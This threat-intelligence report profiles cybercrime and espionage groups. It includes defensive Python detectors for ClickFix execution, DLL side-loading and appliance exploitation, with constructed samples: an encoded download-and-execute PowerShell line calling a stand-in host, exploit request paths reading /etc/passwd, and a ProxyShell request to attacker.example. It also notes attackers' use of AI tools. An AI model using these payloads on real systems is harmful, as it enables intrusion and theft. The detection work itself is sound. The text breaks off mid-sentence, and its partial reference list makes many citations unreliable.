Pryx is a notable threat actor who operates as both a malware/ransomware developer and an identity access broker [8]. Active on cybercrime forums such as XSS since June 2024 and occasionally BreachForums, Pryx has quickly established a reputation within the cybercrime community [8]. This actor has also used the aliases "HolyPryx" and "Sp1d3r" (though not to be confused with another actor using similar aliases) [8].
Pryx’s motivations are primarily financial, but they also exhibit political leanings, particularly an anti-Israel stance, and have stated a focus on the government sector.8 This blend of financial opportunity and political motivation influences their target selection, aiming for both monetary gain and notoriety within the cybercrime community.8
A significant development in Pryx’s activities is the formation of the Hellcat ransomware group in October 2024.8 Hellcat employs a double-extortion tactic, first exfiltrating sensitive data from victims before encrypting their systems. This method allows them to demand a higher ransom by threatening to release the stolen information publicly.8 The group selects targets based on financial opportunity and political motives, seeking to establish themselves as notorious and reputable actors.8
Beyond ransomware, Pryx has contributed to malware development, notably with a write-up on what they describe as “the first server-side stealer in the world”.8 Rather than uploading stolen data to a collection server, the malware stands up a hidden Tor service on the compromised machine and serves the stolen data from there for the operator to retrieve.8 This minimizes the malware’s footprint and network noise: there is no outbound bulk upload to a C2 for egress monitoring to catch, and Tor anonymizes the retrieval.8 The observable that remains is the victim host running a Tor client and hosting an onion service, which is itself anomalous on most corporate endpoints. The design highlights Pryx’s technical sophistication and their focus on stealthy data theft.
Threat Actor: Iran-based Malicious Cyber Actor (Associated with XManX query)
While the term “XManX” is not directly defined as a specific threat actor in the provided material, the associated research points to two distinct but potentially related areas: the emergence of AI-powered hacking tools and an Iran-based malicious cyber actor. This section will focus on the latter, as it represents a defined threat actor group.
This Iran-based malicious cyber actor has been observed conducting widespread campaigns targeting various industries, including information technology, government, healthcare, financial, insurance, and media sectors across the United States.19 Their motivations appear to be a combination of supporting Iranian government interests, potentially operating as a contractor, and pursuing their own financial gains by selling access to compromised network infrastructure on online hacker forums.19 The group also possesses the capability and likely the intent to deploy ransomware on victim networks.19
The TTPs of this actor often begin with mass-scanning activities using tools like Nmap to identify open ports.19 Initial access is primarily gained by exploiting publicly known Common Vulnerabilities and Exposures (CVEs) related to remote external services on internet-facing assets, particularly VPN infrastructure.19 Specific vulnerabilities exploited include those in Pulse Secure VPN (CVE-2019-11510, CVE-2019-11539), Citrix NetScaler (CVE-2019-19781), and F5 (CVE-2020-5902).19
After gaining initial access, the actor focuses on obtaining administrator-level credentials and establishing persistence within the network, often for several months.19 They achieve this by installing web shells (such as ChunkyTuna, Tiny, and China Chopper) and heavily relying on open-source and operating system (OS) tooling like ngrok and fast reverse proxy (FRP).19 Their primary goals once inside a network appear to be maintaining persistence and exfiltrating data.19
It is important to note that the emergence of AI-powered hacking tools such as Xanthorox AI is a significant force multiplier for adversaries.20 While the provided material does not attribute such tools to this Iran-based actor, they are available and would be plausible additions to its toolkit, offering malicious code generation, vulnerability exploitation, data analysis, and polished phishing messages.20 The dual nature of AI as both a threat and a defensive tool underscores the need for organizations to apply AI to their own detection and response capabilities against evolving threats.20
Threat Actor: DustSquad / Golden Falcon
Golden Falcon is an alias for the cyberespionage group known as DustSquad, also identified as APT-C-34 and Nomadic Octopus.21 This group is Russia-aligned and has been active since at least 2014.21
The primary motivation of DustSquad/Golden Falcon is information theft and espionage.21 They specifically target Central Asian users and diplomatic entities, with reported operations in countries like Afghanistan and Kazakhstan.21 Their objectives align with state-sponsored activities, seeking to gather intelligence and sensitive information from government, defense, media, and diplomatic sectors, as well as from dissidents.21
Their operations have involved custom Android and Windows malware, including a malicious program for Windows known as “Octopus”.21 This malware was initially named by ESET in 2017 after a script (“0ct0pus3.php”) found on the actor’s old C2 servers.21 Kaspersky’s attribution engine has linked Octopus to DustSquad, with campaigns traced back to 2014 in former Soviet republics of Central Asia.21 One notable operation documented is the “Nomadic Octopus’ Paperbug Campaign” in 2020.21
Threat Actor: Team Insane PK
Team Insane PK is a hacktivist group known for its activities in religious hacktivism, allegedly based out of Pakistan.22 The group has gained notoriety for numerous cyberattacks, primarily targeting Indian businesses and government websites.22 They have expressed solidarity with Iran and are associated with other hacktivist collectives such as DieNet, Mysterious Team Bangladesh, Z-Alliance, Server Killers, Akatsuki Cyber Team, GhostSec, Keymous+, Inteid, Anonymous Kashmir, and Mr Hamza Cyber Force.23
Team Insane PK’s motivations are driven by religious ideologies, aligning with a concept of “digital jihad” to promote a specific belief system or discredit others.22 Their actions highlight the increasing prominence of non-state actors in cyber warfare, using digital tools to advance their agendas.22
Their primary tactic involves Distributed Denial of Service (DDoS) attacks, which aim to overwhelm a target network with traffic, rendering it inaccessible.22 They have also engaged in website defacement and basic data leaks, often sourcing data from compromised credentials or misconfigured systems.24 These attacks frequently feature religiously motivated messages.22 Since early 2023, the group has shown significant activity targeting Indian digital infrastructure, including educational institutes, telecommunications, manufacturing companies, and national archives.22 While their technical sophistication may be basic, their actions are driven by real-world events and perceived injustices, often leading to exaggerated claims of breaches for media attention.24
Threat Actor: DarkEngine (Associated with darkMods query)
While “darkMods” is not directly identified as a specific threat actor name in the provided material, the information associated with this query extensively describes the “DarkEngine” campaign. This campaign is attributed to a capable, financially motivated threat actor.
The DarkEngine campaign has been active since at least June 2024 and targets customers of WP Engine, a popular managed hosting platform for WordPress websites.25 The actor’s motivation is financial gain, and the campaign shows a significant level of resource investment and capability.25
The TTPs of the DarkEngine campaign involve a multi-stage approach, often leveraging search engine optimization (SEO) poisoning and Google sponsored advertisements to direct users to replica clones of the legitimate WP Engine website.25 This allows the threat actor to steal WP Engine login credentials. By compromising WP Engine accounts, the actor can scale their malicious activities, gaining access to dozens or even hundreds of hosted WordPress sites simultaneously, rather than targeting them individually.25
Once access is gained, the threat actor infects hosted WordPress sites with a backdoor plugin, granting them administrator access and the ability to inject malicious scripts.25 These scripts lead to the delivery of malware to website visitors through fake CAPTCHA prompts, a variation of the ClickFix social engineering technique designed to manipulate users into running malicious commands.25 The campaign has been linked to the delivery of malware such as Yet Another NodeJS Backdoor (YaNB), KongTuke, LandUpdate808 (also referred to as UNC5518), and TAG-1242.25 Similar activity clusters have been associated with Rhysida ransomware, Interlock ransomware, SocGholish, and Asylum Ambuscade operators.25 CyberCX has identified at least 2,353 unique websites potentially compromised by this threat actor, including 82 in Australia and New Zealand, and at least 28 compromised WP Engine credentials.25
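The ClickFix step above ends with the victim pasting a command into the Windows Run dialog, which gives defenders a narrow and reliable detection point: explorer.exe spawning a scripting host with a command line that fetches remote content, hides its window or carries an encoded payload. The following is an added example, not CyberCX’s detection content, that applies that logic to process-creation records and decodes PowerShell’s -EncodedCommand argument so the analyst sees what was actually run. The event records, the hostnames and the command are constructed; the field names are an assumption rather than any particular EDR schema.

```python
# Added example: flag ClickFix-style execution in process-creation telemetry.
# Not CyberCX's code; the events, hostnames and command below are constructed.
import base64
import re

# Binaries a pasted ClickFix command typically launches from the Run dialog.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "curl.exe", "certutil.exe"}
# Indicators in the visible or decoded command line: remote content, hidden window,
# encoded payload, or in-memory execution.
SUSPICIOUS = re.compile(
    r"https?://|-w(?:indowstyle)?\s+hidden|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"
    r"|\biex\b|invoke-expression|downloadstring|\bmshta\b", re.I)
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line):
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text; return that text, or None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_clickfix(event):
    """True when explorer.exe (the Run dialog's parent) spawns a scripting host whose
    command line fetches remote content, hides its window or runs encoded code."""
    if basename(event["parent_image"]) != "explorer.exe":
        return False
    if basename(event["image"]) not in LOLBINS:
        return False
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd) or ""
    return bool(SUSPICIOUS.search(cmd + " " + decoded))


def triage(events):
    return [e for e in events if is_clickfix(e)]


# Constructed sample: the command a fake-CAPTCHA page would place on the clipboard,
# delivered as an encoded PowerShell argument. The hostname is hypothetical.
CLICKFIX_COMMAND = "iex (iwr 'http://wpengine-login.example/v.txt' -UseBasicParsing)"
ENCODED = base64.b64encode(CLICKFIX_COMMAND.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -w hidden -nop -enc {ENCODED}"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://captcha-verify.example/verify.hta"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},  # a user opening an interactive shell
    {"parent_image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c npm run build"},  # wrong parent, benign
]

if __name__ == "__main__":
    for e in triage(SAMPLE_EVENTS):
        print("ClickFix candidate:", e["command_line"][:60],
              "| decoded:", decode_encoded_command(e["command_line"]))
```

The first two sample events are flagged and the encoded one decodes back to the download-and-execute one-liner; the interactive shell and the build command are not. Where process telemetry is missing, the same Run-dialog history survives in the registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which makes it a useful artefact for confirming a ClickFix infection after the fact.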
Threat Actor: WIP26 (PremiumDataOnly query)
The “PremiumDataOnly” query is associated with the threat activity tracked as WIP26. WIP26 is an espionage-focused threat actor that has been observed targeting telecommunication providers in the Middle East.26
The primary motivation for WIP26 is espionage, driven by the sensitive data held by communication providers, which are frequent targets for intelligence gathering.26
WIP26’s TTPs are characterized by the abuse of public cloud infrastructure for various stages of their operations, including malware delivery, data exfiltration, and command-and-control (C2).26 They leverage services such as Microsoft 365 Mail, Google Firebase, Microsoft Azure, and Dropbox to blend their malicious traffic with legitimate network activity, making detection more challenging.26
The initial intrusion vector involves precision targeting through WhatsApp messages containing Dropbox links to a malware loader.26 Tricking employees into executing this loader leads to the deployment of backdoors, dubbed CMD365 and CMDEmber, which then utilize Microsoft 365 Mail and Google Firebase instances for C2 communications.26 Data exfiltration, including users’ private browser data and reconnaissance information on high-value hosts, is orchestrated through PowerShell commands to Microsoft Azure instances.26 The threat actor has used specific Azure websites for malware hosting and data exfiltration.26 They also employ open-source tools like Chisel, masquerading as legitimate applications, to create TCP tunnels over HTTP.26 WIP26 has made operational security (OPSEC) errors, such as leaving a publicly accessible JSON file on their Google Firebase C2 server, providing further insights into their activities.26
Threat Actor: STAC5777 / STAC5143 (Associated with systemxp query)
While “systemxp” is not directly identified as a specific threat actor name in the provided material, the associated research describes two distinct groups of threat actors, STAC5777 and STAC5143, that have been actively exploiting Microsoft’s Office 365 platform.
These groups are likely motivated by data theft and ransomware deployment.27 Their operations highlight the risks associated with cloud service configurations and social engineering.
Their TTPs involve operating their own Microsoft Office 365 tenants and exploiting a default Microsoft Teams configuration that permits external users to initiate chats or meetings with internal users.27 This gives them a direct channel to employees for vishing (voice phishing) attacks. During these calls, the threat actor instructs employees to allow remote screen control sessions via Teams.27 Through these remote sessions, the attackers open command shells, drop and execute malware from external SharePoint file stores, and deploy legitimate Java runtimes (javaw.exe) to execute malicious JAR files.27 They also abuse the legitimate Microsoft-signed OneDriveStandaloneUpdater.exe, placing a malicious winhttp.dll beside it so that the signed binary side-loads the attacker’s code, together with unsigned OpenSSL DLLs, to deploy their payloads.27 The defensive levers sit on the tenant and the endpoint: restricting Teams external access (federation) to an allowlist of partner domains removes the initial contact channel, and alerting on signed Microsoft binaries that load DLLs from user-writable directories catches the side-loading step.
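The following added example, which is not Sophos’ detection content, encodes the two post-access behaviours above as checks over image-load and process-creation records: a Microsoft-signed process loading a well-known system DLL name, or any unsigned DLL, from outside the Windows system directories, and java/javaw executing a JAR from a user-writable path. The records and paths are constructed, and the field names are an assumption rather than a specific EDR or Sysmon schema.

```python
# Added example: detection logic for DLL side-loading by a signed Microsoft binary
# and for javaw.exe running a JAR from a user-writable path.
# Not Sophos' detection content; the records below are constructed.
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
# DLL names that loaders resolve by name and that attackers plant beside a signed EXE.
SYSTEM_DLL_NAMES = {"winhttp.dll", "version.dll", "dbghelp.dll", "cryptbase.dll",
                    "wtsapi32.dll", "userenv.dll", "dwmapi.dll"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\programdata\\", "\\users\\public\\")
JAR_ARG = re.compile(r'-jar\s+(?:"([^"]+\.jar)"|(\S+\.jar))', re.I)


def _norm(path):
    return path.replace("/", "\\").lower()


def basename(path):
    return _norm(path).rsplit("\\", 1)[-1]


def dirname(path):
    return _norm(path).rsplit("\\", 1)[0] + "\\"


def check_image_load(ev):
    """ev: image-load record with the loading process, the DLL path and signature facts.
    Flags a Microsoft-signed process loading a system DLL name, or any unsigned DLL,
    from outside the Windows system directories."""
    dll_dir = dirname(ev["image_loaded"])
    if dll_dir.startswith(SYSTEM_DIRS):
        return None
    loader_is_ms = ev["loader_signed"] and ev["loader_signer"].lower().startswith("microsoft")
    if not loader_is_ms:
        return None
    dll = basename(ev["image_loaded"])
    if dll in SYSTEM_DLL_NAMES:
        return f"{basename(ev['image'])} side-loaded system DLL name {dll} from {dll_dir}"
    if not ev["dll_signed"]:
        return f"{basename(ev['image'])} loaded unsigned DLL {dll} from {dll_dir}"
    return None


def check_process_create(ev):
    """Flags java/javaw executing a JAR from a user-writable location."""
    if basename(ev["image"]) not in {"javaw.exe", "java.exe"}:
        return None
    m = JAR_ARG.search(ev["command_line"])
    if not m:
        return None
    jar = m.group(1) or m.group(2)
    if any(marker in _norm(jar) for marker in USER_WRITABLE):
        return f"{basename(ev['image'])} ran JAR from user-writable path: {jar}"
    return None


ONEDRIVE_DIR = r"C:\Users\alice\AppData\Local\Microsoft\OneDrive"  # constructed
SAMPLE_IMAGE_LOADS = [
    # a malicious winhttp.dll dropped next to the signed updater
    {"image": ONEDRIVE_DIR + r"\OneDriveStandaloneUpdater.exe",
     "image_loaded": ONEDRIVE_DIR + r"\winhttp.dll",
     "loader_signed": True, "loader_signer": "Microsoft Corporation", "dll_signed": False},
    # the genuine system winhttp.dll: expected, not flagged
    {"image": ONEDRIVE_DIR + r"\OneDriveStandaloneUpdater.exe",
     "image_loaded": r"C:\Windows\System32\winhttp.dll",
     "loader_signed": True, "loader_signer": "Microsoft Corporation", "dll_signed": True},
    # an unsigned OpenSSL library pulled in by the side-loaded code
    {"image": ONEDRIVE_DIR + r"\OneDriveStandaloneUpdater.exe",
     "image_loaded": ONEDRIVE_DIR + r"\libcrypto-1_1-x64.dll",
     "loader_signed": True, "loader_signer": "Microsoft Corporation", "dll_signed": False},
]
SAMPLE_PROCESSES = [
    {"image": r"C:\Program Files\Java\jre-1.8\bin\javaw.exe",
     "command_line": r'"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\alice\AppData\Local\Temp\update.jar"'},
    {"image": r"C:\Program Files\Java\jre-1.8\bin\javaw.exe",
     "command_line": r'"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Program Files\Acme\app.jar"'},
]


def run_checks():
    loads = [f for f in (check_image_load(e) for e in SAMPLE_IMAGE_LOADS) if f]
    procs = [f for f in (check_process_create(e) for e in SAMPLE_PROCESSES) if f]
    return loads + procs


if __name__ == "__main__":
    for finding in run_checks():
        print(finding)
```

The unsigned-DLL rule will fire on some legitimate Microsoft-signed applications that ship third-party native libraries, so treat it as a triage signal and tune by loader path; the system-DLL-name rule is far more specific and is the one to page on.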
STAC5777 has been observed to overlap with a group previously identified by Microsoft as Storm-1811.27 STAC5143 is a newly reported threat cluster that appears to be copying the Storm-1811 playbook, with potential connections to the financially motivated group tracked as FIN7 (also known as Sangria Tempest and Carbon Spider).27 These activities demonstrate a focus on exploiting common enterprise communication and collaboration platforms for initial access and malware delivery.
Threat Actor: G_mic
G_mic is a cybercriminal operating on online forums, known for claiming and offering for sale large datasets allegedly stolen from major telecommunications companies.28
The primary motivation for G_mic’s activities is financial gain, achieved through the sale of stolen customer data on cybercrime forums.28
G_mic’s TTPs involve breaching company systems to exfiltrate sensitive customer information. In one notable instance, G_mic claimed to have breached Verizon and T-Mobile US, offering data purportedly belonging to 61 million Verizon customers (3.1 GB) and 55 million T-Mobile US customers.28 The data allegedly includes personal and contact details, updated for 2025, and was offered for sale in CSV and JSON formats.28 While specific technical details of G_mic’s breach methods are not provided, the nature of the data offered suggests successful access to customer databases.
The broader context of threat actors using generative AI tools like Gemini for operational support, including research, troubleshooting code, content generation, and vulnerability research, indicates a general trend of adversaries leveraging advanced technologies to enhance their capabilities.30 While not directly linked to G_mic, this illustrates the evolving landscape in which cybercriminals operate.
Threat Actor: APT26 / TRIPLESTRENGTH / IntelBroker / Twelve (Associated with Putra26 query)
The “Putra26” query in the provided material does not directly identify a specific threat actor by that name. However, the associated research snippets point to several distinct and significant threat actors and groups: APT26, TRIPLESTRENGTH, IntelBroker, and Twelve.
APT26 (aka BRONZE EXPRESS, JerseyMikes, TECHNETIUM, TURBINE PANDA, Taffeta Typhoon) is a Chinese cyber espionage group.31 Their motivation is state-sponsored espionage, focusing on stealing technology and sensitive information, and their campaigns have involved the PlugX malware among other tools.31 Note that the targeting profile attached to this entry, East Asia and particularly Taiwan with occasional operations against Japan and Hong Kong, is drawn from a profile of BlackTech, a separate Chinese espionage group, and should not be read as confirmed APT26 targeting.32
TRIPLESTRENGTH is a financially motivated threat actor that opportunistically targets cloud environments.33 Their objectives include illicit cryptocurrency mining (cryptojacking), ransomware deployment, and selling access to compromised cloud platforms (e.g., Google Cloud, AWS, Microsoft Azure, Linode, OVHCloud, Digital Ocean).33 Initial access is often gained through stolen credentials and cookies, some sourced from Raccoon information stealer infection logs.33 They abuse hijacked environments to create compute resources for mining and leverage highly privileged accounts to add attacker-controlled accounts as billing contacts.33 They have deployed RCRU64 ransomware, gaining initial access via RDP, performing lateral movement, and evading antivirus defenses.33
IntelBroker (aka Kai West, Kyle Northern) is a serial hacker and prominent data broker known for high-profile cyberattacks and selling exfiltrated data.34 IntelBroker is closely associated with the deep web hacking forum BreachForums, where the actor held a moderator role.34 Their motivation is financial gain through data sales. IntelBroker has been charged with causing millions of dollars in damages to victims, including Hewlett Packard Enterprise (HPE), Cisco, and Nokia, by stealing source code, private GitHub repositories, and certificates.34 The actor was reportedly arrested in France in February 2025.34
Twelve is a hacktivist group that emerged around April 2023, following the onset of the Russo-Ukrainian war.38 Their motivation is ideological, aiming to inflict maximum damage on Russian targets by crippling networks and disrupting business operations, rather than financial gain.38 They conduct hack-and-leak operations, exfiltrating sensitive information and sharing it on their Telegram channel.38 Twelve utilizes a range of publicly available tools, including Cobalt Strike, Mimikatz, Chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, and PsExec for credential theft, discovery, network mapping, and privilege escalation.38 They exploit known vulnerabilities in software like VMware vCenter (e.g., CVE-2021-21972, CVE-2021-22005) to deliver web shells and backdoors like FaceFish.38 They disguise malware and tasks under legitimate-sounding names to evade detection and have used versions of LockBit 3.0 ransomware.38 Overlaps have been identified between Twelve and another hacktivist group, BlackJack.38
Threat Actor: Ghost (DigitalGhost query)
The “DigitalGhost” query is associated with the threat actor known as Ghost, also identified by aliases such as Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.39 This group is primarily based in China and is financially motivated.39
Ghost actors conduct widespread ransomware attacks for financial gain, targeting a diverse range of sectors, including critical infrastructure, schools, universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and small- and medium-sized businesses.39
Their TTPs for initial access involve exploiting publicly facing applications associated with multiple Common Vulnerabilities and Exposures (CVEs).39 They specifically target networks where available patches have not been applied, exploiting known vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), Adobe ColdFusion (CVE-2010-2861, CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, commonly known as ProxyShell).39
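Both Ghost and the Iran-based actor profiled earlier rely on public exploits against internet-facing appliances, and most of those exploits leave a recognisable request path in the appliance or web server access log. The following added example (not from the CISA advisories cited on this page) scans Combined Log Format lines for the documented request paths of the CVEs named in this report that are visible in a URL: CVE-2019-11510, CVE-2019-19781 and CVE-2020-5902 from the Iran-based actor section, and CVE-2018-13379 and the ProxyShell autodiscover path (CVE-2021-34473) from this one. Exploits whose payload travels in the request body (CVE-2019-11539, CVE-2019-0604, the ColdFusion CVEs) are not covered by path matching. The log lines and IP addresses are constructed.

```python
# Added example: scan access logs for exploitation attempts against the publicly
# documented request paths of the CVEs this report attributes to the Iran-based
# actor (Pulse Secure, Citrix, F5) and to Ghost (FortiOS, ProxyShell).
# Not from the CISA advisories; the log lines and IP addresses below are constructed.
import re
from urllib.parse import unquote

# (CVE, description, pattern applied to the fully URL-decoded request target)
INDICATORS = [
    ("CVE-2019-11510", "Pulse Secure arbitrary file read",
     re.compile(r"/dana-na/\.\./dana/html5acc/guacamole/(?:\.\./)+", re.I)),
    ("CVE-2019-19781", "Citrix ADC/Gateway directory traversal",
     re.compile(r"/vpn/\.\./vpns/", re.I)),
    ("CVE-2020-5902", "F5 BIG-IP TMUI path traversal",
     re.compile(r"/tmui/login\.jsp/\.\.;/", re.I)),
    ("CVE-2018-13379", "FortiOS SSL VPN path traversal",
     re.compile(r"/remote/fgt_lang\?lang=(?:/+\.\.)+", re.I)),
    ("CVE-2021-34473", "Exchange ProxyShell autodiscover SSRF",
     re.compile(r"/autodiscover/autodiscover\.json\?@|Email=autodiscover/autodiscover\.json\?@", re.I)),
]

# Combined Log Format: client, ident, user, [time], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def fully_unquote(target):
    """Decode until stable so double encoding (%252e%252e) ends up as '..' too."""
    while True:
        decoded = unquote(target)
        if decoded == target:
            return decoded
        target = decoded


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_access_log(lines):
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        target = fully_unquote(rec["target"])
        for cve, desc, pattern in INDICATORS:
            if pattern.search(target):
                hits.append({"ip": rec["ip"], "ts": rec["ts"], "cve": cve, "desc": desc,
                             "status": int(rec["status"]), "target": rec["target"]})
                break
    return hits


def summarize(hits):
    """Map each source IP to the CVEs it probed; one source walking several appliance
    exploits is the mass-scan-then-exploit pattern described in the text."""
    by_ip = {}
    for h in hits:
        by_ip.setdefault(h["ip"], set()).add(h["cve"])
    return {ip: sorted(cves) for ip, cves in by_ip.items()}


# Constructed sample log. Two sources probe several appliances; 192.0.2.4 is benign
# traffic, including a legitimate Autodiscover v2 request that contains an '@'.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jul/2025:10:02:11 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1423 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Jul/2025:10:02:13 +0000] "GET /vpn/%2e%2e/vpns/cfg/smb.conf HTTP/1.1" 200 618 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [05/Jul/2025:10:05:40 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1101 "-" "python-requests/2.31"',
    '198.51.100.9 - - [05/Jul/2025:10:05:41 +0000] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 200 8192 "-" "python-requests/2.31"',
    '198.51.100.9 - - [05/Jul/2025:10:06:02 +0000] "POST /autodiscover/autodiscover.json?@attacker.example/powershell HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [05/Jul/2025:10:07:00 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [05/Jul/2025:10:07:30 +0000] "GET /autodiscover/autodiscover.json?Email=alice@corp.example&Protocol=ActiveSync HTTP/1.1" 200 312 "-" "Outlook"',
]

if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["cve"], h["status"], h["target"][:60])
    print(summarize(found))
```

Five of the seven sample lines are flagged, grouped as two sources probing two and three CVEs respectively; the welcome page and the legitimate Autodiscover request are not. The status code matters: a 200 on a traversal request means the appliance returned the file, so the host should be treated as compromised (credentials and session files exposed) rather than merely scanned, which is the distinction that decides whether the response is a patch or a credential reset plus forensic review.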
Upon gaining access, Ghost actors upload web shells to compromised servers and leverage Windows Command Prompt and PowerShell to download and execute Cobalt Strike Beacon malware.39 While Cobalt Strike is a commercially available adversary simulation tool, Ghost actors use it maliciously.39 Persistence is not a major focus for Ghost, as they often move from initial compromise to ransomware deployment within the same day, though they have been observed creating new local and domain accounts or changing existing passwords.39 For privilege escalation, they rely on built-in Cobalt Strike functions to steal process tokens and use open-source tools like SharpZeroLogon, SharpGPPPass, BadPotato, and GodPotato.39 They also use Cobalt Strike’s “hashdump” or Mimikatz to collect passwords and hashes for unauthorized logins and lateral movement.39 Organizations that have identified and responded to the unusual commands, scripts, and programs run by Ghost actors have successfully prevented ransomware attacks.39
Threat Actor: RA GROUP / The Dark Overlord (Associated with BABAYO EROR SYSTEM query)
The “BABAYO EROR SYSTEM” query does not directly correspond to a known threat actor in the provided material. However, the associated research details two prominent cybercrime groups: RA GROUP and The Dark Overlord (TDO).
RA GROUP is a relatively new ransomware group that emerged online in April 2023.9 Their motivation is purely financial, focusing on ransomware and data exfiltration. RA GROUP leverages the leaked Babuk ransomware source code, which became publicly available in September 2021, demonstrating how leaked code can quickly enable new criminal operations.9
RA GROUP employs a double-extortion model, claiming to steal large volumes of data before encrypting systems.9 They use custom ransom notes that specify short payment deadlines (three days before a sample is published, seven days before the full dataset).9 Their targets have included companies in the insurance, financial services, and electronics industries in the U.S. and South Korea.9 The group’s website has undergone cosmetic changes, indicating they are in the early stages of their operation.9
The Dark Overlord (TDO) is an international hacker organization known for high-profile cybercrime extortion and public demands for ransom.40 Their primary motivation is financial gain, often through the sale of stolen confidential documents and medical records on dark web marketplaces.40
TDO gained notoriety through the sale of stolen medical records and later for extorting entities like Netflix (leaking unreleased episodes of “Orange Is the New Black”) and Disney.40 In 2017, they expanded into terror-based attacks, sending life-threatening text messages to students and parents in school districts, demanding payment to prevent harm.40 A significant incident involved the “9/11 Papers” hack in December 2018, where TDO threatened to release thousands of incriminating documents related to Lloyd’s of London and Silverstein Properties unless a $2,000,000 Bitcoin ransom was paid.40 TDO uses public platforms like Twitter and Pastebin to announce their hacks and demands, though they have faced bans from these platforms.40 A member, Nathan Wyatt, was arrested and sentenced in the U.S. for conspiracy to commit aggravated identity theft and computer fraud.40
Threat Actor: Anonymous / Black Maskers Army (Associated with Tunisian Maskers Cyber Force query)
The “Tunisian Maskers Cyber Force” query does not directly identify a specific threat actor in the provided material. However, the associated research describes the broader hacktivist collective Anonymous and the specific group Black Maskers Army, both of which have relevance to the context of hacktivism and regional cyber activities.
Anonymous is a decentralized international activist and hacktivist collective known for various cyberattacks against governments, institutions, corporations, and other entities.41 Their motivations are primarily ideological, opposing internet censorship and control, and supporting movements like the Arab Spring and Occupy.41 They aim to draw public attention to
Works cited
1. Threat actor | Flashpoint, accessed July 5, 2025, https://flashpoint.io/intelligence-101/threat-actor/
2. What is a Cyber Threat Actor? | CrowdStrike, accessed July 5, 2025, https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/threat-actor/
3. Threat Actors: Common Types & Best Defenses Against Them | Splunk, accessed July 5, 2025, https://www.splunk.com/en_us/blog/learn/threat-actors.html
4. An introduction to the cyber threat environment – Canadian Centre for Cyber Security, accessed July 5, 2025, https://www.cyber.gc.ca/en/guidance/introduction-cyber-threat-environment
5. TA829 and UNK_GreenSec Share Tactics and Infrastructure in Ongoing Malware Campaigns – The Hacker News, accessed July 5, 2025, https://thehackernews.com/2025/07/ta829-and-unkgreensec-share-tactics-and.html
6. Proofpoint links TA829 & UNK_GreenSec in cybercrime overlap – Security Brief UK, accessed July 5, 2025, https://securitybrief.co.uk/story/proofpoint-links-ta829-unk_greensec-in-cybercrime-overlap
7. Cybercrime: A Multifaceted National Security Threat | Google Cloud Blog, accessed July 5, 2025, https://cloud.google.com/blog/topics/threat-intelligence/cybercrime-multifaceted-national-security-threat
8. Threat Actor Spotlight: Pryx – Morado Intelligence, accessed July 5, 2025, https://www.morado.io/blog-posts/threat-actor-spotlight-pryx
9. Ransomware group claims 2.5 terabytes of stolen data less than a month after emerging online | CyberScoop, accessed July 5, 2025, https://cyberscoop.com/ransomware-group-ra-group-talos/
10. Dark Web Profile: BlackCat (ALPHV) – SOCRadar® Cyber Intelligence Inc., accessed July 5, 2025, https://socradar.io/dark-web-profile-blackcat-alphv/
11. black-basta-threat-profile.pdf – HHS.gov, accessed July 5, 2025, https://www.hhs.gov/sites/default/files/black-basta-threat-profile.pdf
12. How Microsoft names threat actors – Unified security operations, accessed July 5, 2025, https://learn.microsoft.com/en-us/unified-secops-platform/microsoft-threat-actor-naming
